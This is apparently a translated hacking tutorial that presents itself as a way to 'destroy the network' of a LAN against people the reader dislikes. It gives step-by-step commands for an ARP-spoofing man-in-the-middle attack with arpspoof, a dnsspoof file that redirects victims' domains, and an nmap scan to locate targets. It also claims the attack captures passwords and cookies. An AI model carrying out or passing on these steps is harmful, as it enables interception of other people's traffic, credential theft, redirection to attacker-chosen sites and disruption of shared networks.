Hacking tricks in LAN

Tut this time, I will guide you how to destroy the network in LAN. So if anyone hates, break it.

Join the channel Telegram of the AnonyViet 👉 Link 👈

Prepare :
_ Backtrack 5 R3 (this is installed on a virtual machine for easy use.

_ On windows you can use cain & abel to do the same thing but may not be as flexible as
Link to download BT: http://www.backtrack-linux.org/downloads/

_ LAN connection (of course)
_ Victim (this is a bit redundant)

Method:

_The method I use is called Man-in-the-middle (MITM), this method is very useful and dangerous for others if the attacker uses it well. You can :

+ Get the information sent from the victim machine (ID:pass, cookie, URL …)
+ Full control over the victim’s network, in general, we own the network.
In this article, I will show you how to redirect the victim’s network

About MITM:

In this article, suppose we have a LAN with:

Router ( IP:192.168.0.1)
Attacker (IP:192.168.0.117)
Victim (IP:192.168.0.104)

Note: If you want to find the victim’s IP, use network scanning programs to see or use Backtrack’s available Nmap (instructions at the end of the post).

The principle here is that we will impersonate as:
+ Hill with the victim machine: I pretend to be a router
+ For the router: we pretend to be the victim machine
Diagram :
Normal :

Router <==> Victim
/\
||
||
\/
Attacker

MITM:

Router <==> Attacker <==> Victim

Perform:

All of the following steps are done in Backtrack’s Terminal!!!

First, we port forward the IP to not DOS the LAN due to a problem (I’ve never had this problem, but it’s better to be careful)

Code:

echo 1 > /proc/sys/net/ipv4/ip_forward

Then we type:

+ Case 1 (knowing IP victim and targeting only that 1 victim):

Code:

arpspoof -i <interface> -t <victim ip> <router ip>

Open another terminal and type:

Code:

arpspoof -i <interface> -t <router ip> <victim ip>

+ Case 2 (targeting the whole network):

Code:

arpspoof -i <interface> <router ip>

Trường hợp 2 mọi người nhớ cẩn thận nếu như nhiều người trong mạng quá có thể gây DOS.

Redirect :

After completing the MITM step, we continue to the breaking part:

I will use DNS Spoofing method to redirect victims to predefined websites:

First, we create a txt file, in which we type the following syntax:

<ip> <website>

where is the IP of the website that we want to redirect the victim to, is the website that when the victim visits, it will be redirected to our website.
Eg:
127.0.0.1 www.google.com ( redirect to localhost )
-or-
74.125.224.46 www.facebook.com (when the victim enters facebook.com, it will be redirected to google.com)

We can use the * sign as an “inclusive” way, for example:

74.125.224.46 www.*.com (all sites starting with www and ending with .com will be redirected)

After we create the text file, we open another Terminal and type:

Code:

[code][/code]

dnsspoof -i <interface> -f <đường dẫn đến file txt mới tạo>

And then we sit back and wait and see the results.
<<—-END—->>

: is the network card used (usually eth0 or wlan0 if using wifi). You can check with the command:
Code:

ifconfig

Instructions to Scan IP:

Open Terminal and type:
Code:

Inside:
-T4 : select scan IPv4
-O : select scan operating system

For example, my home IP starts with 192.168.0.xxx, then type:
Code:

Code:

nmap -T4 -O 192.168.0.0/24

Note that we type 0 in the last bit of IP, instead of xxx. “/24” is the prefix, just type it in to scan the entire network.

As a result, you will get a list of IPs in the network and operating system, if scanned.

Solution when done:

Attacker side:
In each Terminal press Ctrl + C to terminate, the program will automatically reset the values.

Victim’s side:
Wait 5 minutes
-or-
Start-Run-Cmd :
Code:

ipconfig/flushdns

Instructions for configuring the network card for Virtual Box to use ==> Must read<== (the reason is that if you don't config, leave it by default, when attacking the victim's machine will lose internet connection):